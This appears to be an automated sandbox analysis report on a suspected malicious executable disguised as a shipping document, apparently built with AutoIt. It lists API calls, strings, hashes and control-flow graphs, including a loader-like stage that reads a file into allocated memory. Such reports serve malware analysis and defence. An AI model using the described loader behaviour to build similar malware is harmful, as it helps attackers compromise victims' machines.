                                                                                                                              • LockResource.KERNEL32(009B4EEE,?,?,009B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,009B4F8F,00000000), ref: 009EDCB8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                              • String ID: SCRIPT
                                                                                                                              • API String ID: 3051347437-3967369404
                                                                                                                              • Opcode ID: fbd0affe340012e2a36c0f01b5c9ffc571f62efa24c0862d8c5f81c9a132d18d
                                                                                                                              • Instruction ID: cef9fc0e11f7672123031a22a6228298ac80d137450abe4e9ff4f1528a06772f
                                                                                                                              • Opcode Fuzzy Hash: fbd0affe340012e2a36c0f01b5c9ffc571f62efa24c0862d8c5f81c9a132d18d
                                                                                                                              • Instruction Fuzzy Hash: 62115A75600700BFD7219FA5DD48FA77BBDEBC9B61F204569F80A86260DB72EC01C660
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3964851224-0
                                                                                                                              • Opcode ID: 01c2d1d38771f8051de7c7debb60b3cd47bf2b4da1202bebef3a9b16d5d5bb4e
                                                                                                                              • Instruction ID: 7f9adc3b0328b9a4928807cf41058bddd11ebe3e7dda6f75ae7f89a1fc9342be
                                                                                                                              • Opcode Fuzzy Hash: 01c2d1d38771f8051de7c7debb60b3cd47bf2b4da1202bebef3a9b16d5d5bb4e
                                                                                                                              • Instruction Fuzzy Hash: 8B925570A08341CFD724DF18C580B6BBBE5BB88314F14896DE98A9B362D775EC45CB92
                                                                                                                              Strings
                                                                                                                              • Variable must be of type 'Object'., xrefs: 009F41BB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Variable must be of type 'Object'.
                                                                                                                              • API String ID: 0-109567571
                                                                                                                              • Opcode ID: 993e82b9aa485098cb6143a1562c94ac14e9e0b6c9521bf44eb16e3a85d14dfe
                                                                                                                              • Instruction ID: c715389c6f78542f5f624492fa7886ea5816910beb10b22acb4dbf27ee9fb847
                                                                                                                              • Opcode Fuzzy Hash: 993e82b9aa485098cb6143a1562c94ac14e9e0b6c9521bf44eb16e3a85d14dfe
                                                                                                                              • Instruction Fuzzy Hash: E7A27F74A04219CFCB14CF58CA90AEEB7B9FF58320F248559E916AB351D735ED82CB90
                                                                                                                              APIs
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009C0BBB
                                                                                                                              • timeGetTime.WINMM ref: 009C0E76
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009C0FB3
                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 009C0FC1
                                                                                                                              • LockWindowUpdate.USER32(00000000), ref: 009C105A
                                                                                                                              • DestroyWindow.USER32 ref: 009C1066
                                                                                                                              • GetMessageW.USER32 ref: 009C1080
                                                                                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 009F51DC
                                                                                                                              • TranslateMessage.USER32(?), ref: 009F5FB9
                                                                                                                              • DispatchMessageW.USER32(?), ref: 009F5FC7
                                                                                                                              • GetMessageW.USER32 ref: 009F5FDB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                              • API String ID: 4212290369-3242690629
                                                                                                                              • Opcode ID: a4bda8627a0338fa73dea5082aff1d62d91371e5d1f8bdd67d4cfd6eb28ab558
                                                                                                                              • Instruction ID: 026792ee08dea702419dd5246194d04c02a533bea748fff9de5d4b19283e499b
                                                                                                                              • Opcode Fuzzy Hash: a4bda8627a0338fa73dea5082aff1d62d91371e5d1f8bdd67d4cfd6eb28ab558
                                                                                                                              • Instruction Fuzzy Hash: 51B2D370A08745DFD724DF24C984FAAB7E9BF84304F15891DF69A872A1C774E885CB82

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetSysColorBrush.USER32 ref: 009B3074
                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 009B309E
                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009B30AF
                                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 009B30CC
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009B30DC
                                                                                                                              • LoadIconW.USER32 ref: 009B30F2
                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009B3101
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                                              • Opcode ID: 8eefb92e6518f424ab2c848d9f5377affa5de38e6521942e6fd5745501968184
                                                                                                                              • Instruction ID: 0da8db0db5ca933f6ce26b61fd19c39e7443cc45ba82bfdd1f25207bf4df11eb
                                                                                                                              • Opcode Fuzzy Hash: 8eefb92e6518f424ab2c848d9f5377affa5de38e6521942e6fd5745501968184
                                                                                                                              • Instruction Fuzzy Hash: 3831F4B1C50309AFDB50CFE4EC84AC9BBF0FB09310F14852AF594A62A0E7B54582CF91

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetSysColorBrush.USER32 ref: 009B3074
                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 009B309E
                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009B30AF
                                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 009B30CC
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009B30DC
                                                                                                                              • LoadIconW.USER32 ref: 009B30F2
                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009B3101
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                                              • Opcode ID: 98b3a10a7eaa0dc5f178a3b80b90b40b55cf7b5b46ad01bdda1ec69c8095d167
                                                                                                                              • Instruction ID: 83722e9e8e94db5928454fd2c45de34a807ed5a1b5570d91f0e1ed9b7b973444
                                                                                                                              • Opcode Fuzzy Hash: 98b3a10a7eaa0dc5f178a3b80b90b40b55cf7b5b46ad01bdda1ec69c8095d167
                                                                                                                              • Instruction Fuzzy Hash: DC21C3B1D11218AFDB00DFE8ED89BDDBBF4FB08710F00812AF915A62A0D7B145869F91

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A752F8,?,009B37C0,?), ref: 009B4882
                                                                                                                                • Part of subcall function 009D068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,009B72C5), ref: 009D06AD
                                                                                                                              • RegOpenKeyExW.KERNEL32 ref: 009B7308
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009EEC21
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 009EEC62
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 009EECA0
                                                                                                                              • _wcscat.LIBCMT ref: 009EECF9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                              • API String ID: 2673923337-2727554177
                                                                                                                              • Opcode ID: 42b17d996b0a6afad160f045fd92345d7ac549a933cf63fd408417e5a3955090
                                                                                                                              • Instruction ID: 8afc5fdab792c16d9eac1302230bcd7a2cd5c31bbb09d9a788586b9227c84aac
                                                                                                                              • Opcode Fuzzy Hash: 42b17d996b0a6afad160f045fd92345d7ac549a933cf63fd408417e5a3955090
                                                                                                                              • Instruction Fuzzy Hash: 5B716D719087019EC744EFA5DD81ADBBBE8FFD4350F40892EF449932A1EB309989CB91

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetSysColorBrush.USER32 ref: 009B3A62
                                                                                                                              • LoadCursorW.USER32 ref: 009B3A71
                                                                                                                              • LoadIconW.USER32 ref: 009B3A88
                                                                                                                              • LoadIconW.USER32 ref: 009B3A9A
                                                                                                                              • LoadIconW.USER32 ref: 009B3AAC
                                                                                                                              • LoadImageW.USER32 ref: 009B3AD2
                                                                                                                              • RegisterClassExW.USER32(?), ref: 009B3B28
                                                                                                                                • Part of subcall function 009B3041: GetSysColorBrush.USER32 ref: 009B3074
                                                                                                                                • Part of subcall function 009B3041: RegisterClassExW.USER32(00000030), ref: 009B309E
                                                                                                                                • Part of subcall function 009B3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009B30AF
                                                                                                                                • Part of subcall function 009B3041: InitCommonControlsEx.COMCTL32(?), ref: 009B30CC
                                                                                                                                • Part of subcall function 009B3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009B30DC
                                                                                                                                • Part of subcall function 009B3041: LoadIconW.USER32 ref: 009B30F2
                                                                                                                                • Part of subcall function 009B3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009B3101
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                              • API String ID: 423443420-4155596026
                                                                                                                              • Opcode ID: 579f50f34f04d71c15414c24c9bdb750f63b7d75ce216dc82718396731e601f5
                                                                                                                              • Instruction ID: 3dc5413f6386b49c47bad3da541768c7a501b0f2afcc38e6279ba21fbbbaeaeb
                                                                                                                              • Opcode Fuzzy Hash: 579f50f34f04d71c15414c24c9bdb750f63b7d75ce216dc82718396731e601f5
                                                                                                                              • Instruction Fuzzy Hash: 4A213CB1D10304AFEB10DFF4ED09BDD7BB5EB08711F10851AF608A62A2D7B555828F94

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 670 9b3633-9b3681 672 9b3683-9b3686 670->672 673 9b36e1-9b36e3 670->673 675 9b3688-9b368f 672->675 676 9b36e7 672->676 673->672 674 9b36e5 673->674 679 9b36ca-9b36d2 DefWindowProcW 674->679 677 9b375d-9b3765 PostQuitMessage 675->677 678 9b3695-9b369a 675->678 680 9ed24c-9ed27a call 9c11d0 call 9c11f3 676->680 681 9b36ed-9b36f0 676->681 686 9b3711-9b3713 677->686 682 9ed2bf-9ed2d3 call a1281f 678->682 683 9b36a0-9b36a2 678->683 685 9b36d8-9b36de 679->685 715 9ed27f-9ed286 680->715 687 9b36f2-9b36f3 681->687 688 9b3715-9b373c SetTimer RegisterWindowMessageW 681->688 682->686 706 9ed2d9 682->706 689 9b36a8-9b36ad 683->689 690 9b3767-9b3776 call 9b4531 683->690 686->685 694 9ed1ef-9ed1f2 687->694 695 9b36f9-9b370c KillTimer call 9b44cb call 9b3114 687->695 688->686 691 9b373e-9b3749 CreatePopupMenu 688->691 696 9b36b3-9b36b8 689->696 697 9ed2a4-9ed2ab 689->697 690->686 691->686 701 9ed228-9ed247 MoveWindow 694->701 702 9ed1f4-9ed1f6 694->702 695->686 704 9b374b-9b375b call 9b45df 696->704 705 9b36be-9b36c4 696->705 697->679 712 9ed2b1-9ed2ba call a07f5e 697->712 701->686 709 9ed1f8-9ed1fb 702->709 710 9ed217-9ed223 SetFocus 702->710 704->686 705->679 705->715 706->679 709->705 716 9ed201-9ed212 call 9c11d0 709->716 710->686 712->679 715->679 720 9ed28c-9ed29f call 9b44cb call 9b43db 715->720 716->686 720->679
                                                                                                                              APIs
                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 009B36D2
                                                                                                                              • KillTimer.USER32 ref: 009B36FC
                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009B371F
                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009B372A
                                                                                                                              • CreatePopupMenu.USER32 ref: 009B373E
                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 009B375F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                              • String ID: TaskbarCreated
                                                                                                                              • API String ID: 129472671-2362178303
                                                                                                                              • Opcode ID: e00b5a5ca7e36623bb3a2b7b4179f3f651ecdc7a6869cb111d9df6d2b4851e6c
                                                                                                                              • Instruction ID: 9a28631d5c8b623114ae19a716fbf09e719952898be7b858651ec483e3ff569f
                                                                                                                              • Opcode Fuzzy Hash: e00b5a5ca7e36623bb3a2b7b4179f3f651ecdc7a6869cb111d9df6d2b4851e6c
                                                                                                                              • Instruction Fuzzy Hash: 2D416BB1A14905FFDB14DFB4DE4ABF93758E700320F10C524FA06C62A2DEA5DE419362

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                              • API String ID: 1825951767-3513169116
                                                                                                                              • Opcode ID: a4c8d26791d5b6ac95ee0fd6c0ce43e060555782cf0d4569041345d32dbf2105
                                                                                                                              • Instruction ID: cbd543426fa042c60cab07383bf1ef998f2f709bada3b6626d921f5e43079277
                                                                                                                              • Opcode Fuzzy Hash: a4c8d26791d5b6ac95ee0fd6c0ce43e060555782cf0d4569041345d32dbf2105
                                                                                                                              • Instruction Fuzzy Hash: 0AA14F71C10229AADB04EFE5CD95BEEB778BF54320F40452AF416B7192DF749A09CBA0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 845 ea1fe8-ea2096 call e9f9e8 848 ea209d-ea20c3 call ea2ef8 CreateFileW 845->848 851 ea20ca-ea20da 848->851 852 ea20c5 848->852 857 ea20dc 851->857 858 ea20e1-ea20fb VirtualAlloc 851->858 853 ea2215-ea2219 852->853 855 ea225b-ea225e 853->855 856 ea221b-ea221f 853->856 859 ea2261-ea2268 855->859 860 ea222b-ea222f 856->860 861 ea2221-ea2224 856->861 857->853 864 ea20fd 858->864 865 ea2102-ea2119 ReadFile 858->865 866 ea226a-ea2275 859->866 867 ea22bd-ea22d2 859->867 862 ea223f-ea2243 860->862 863 ea2231-ea223b 860->863 861->860 870 ea2253 862->870 871 ea2245-ea224f 862->871 863->862 864->853 872 ea211b 865->872 873 ea2120-ea2160 VirtualAlloc 865->873 874 ea2279-ea2285 866->874 875 ea2277 866->875 868 ea22e2-ea22ea 867->868 869 ea22d4-ea22df VirtualFree 867->869 869->868 870->855 871->870 872->853 876 ea2162 873->876 877 ea2167-ea2182 call ea3148 873->877 878 ea2299-ea22a5 874->878 879 ea2287-ea2297 874->879 875->867 876->853 885 ea218d-ea2197 877->885 882 ea22b2-ea22b8 878->882 883 ea22a7-ea22b0 878->883 881 ea22bb 879->881 881->859 882->881 883->881 886 ea21ca-ea21de call ea2f58 885->886 887 ea2199-ea21c8 call ea3148 885->887 893 ea21e2-ea21e6 886->893 894 ea21e0 886->894 887->885 895 ea21e8-ea21ec CloseHandle 893->895 896 ea21f2-ea21f6 893->896 894->853 895->896 897 ea21f8-ea2203 VirtualFree 896->897 898 ea2206-ea220f 896->898 897->898 898->848 898->853
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EA20B9
                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EA22DF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348490692.0000000000E9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9F000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e9f000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFileFreeVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 204039940-0
                                                                                                                              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                                              • Instruction ID: 9b8200c7222a77f774da55064b4c14d2302904115ef24806867596ba267f1695
                                                                                                                              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                                              • Instruction Fuzzy Hash: D9A13970E00209EBDB14CFE8C884BEEBBB5FF59304F209159E611BB290D775AA41DB60

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 976 9b39e7-9b3a57 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CreateShow
                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                              • Opcode ID: d0b8bf6a97f81176580368f51fc5ea01663110e48a9e40133b2c7fbf378e1751
                                                                                                                              • Instruction ID: a0a017630eec66ad8d5e66baeba6ec4d7f54772c4f6aad87249889d64eca76a8
                                                                                                                              • Opcode Fuzzy Hash: d0b8bf6a97f81176580368f51fc5ea01663110e48a9e40133b2c7fbf378e1751
                                                                                                                              • Instruction Fuzzy Hash: AFF03070D102907EEA3097A36C09EA72E7DD7C6F50F008029B908A2271C5A14882DAB0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 977 ea1d98-ea1edc call e9f9e8 call ea1c88 CreateFileW 984 ea1ede 977->984 985 ea1ee3-ea1ef3 977->985 986 ea1f93-ea1f98 984->986 988 ea1efa-ea1f14 VirtualAlloc 985->988 989 ea1ef5 985->989 990 ea1f18-ea1f2f ReadFile 988->990 991 ea1f16 988->991 989->986 992 ea1f33-ea1f6d call ea1cc8 call ea0c88 990->992 993 ea1f31 990->993 991->986 998 ea1f89-ea1f91 ExitProcess 992->998 999 ea1f6f-ea1f84 call ea1d18 992->999 993->986 998->986 999->998
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00EA1C88: Sleep.KERNELBASE(000001F4), ref: 00EA1C99
                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EA1ED2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348490692.0000000000E9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9F000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e9f000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFileSleep
                                                                                                                              • String ID: 7JSGYEQBL6RTTZ5VVP8C
                                                                                                                              • API String ID: 2694422964-68541440
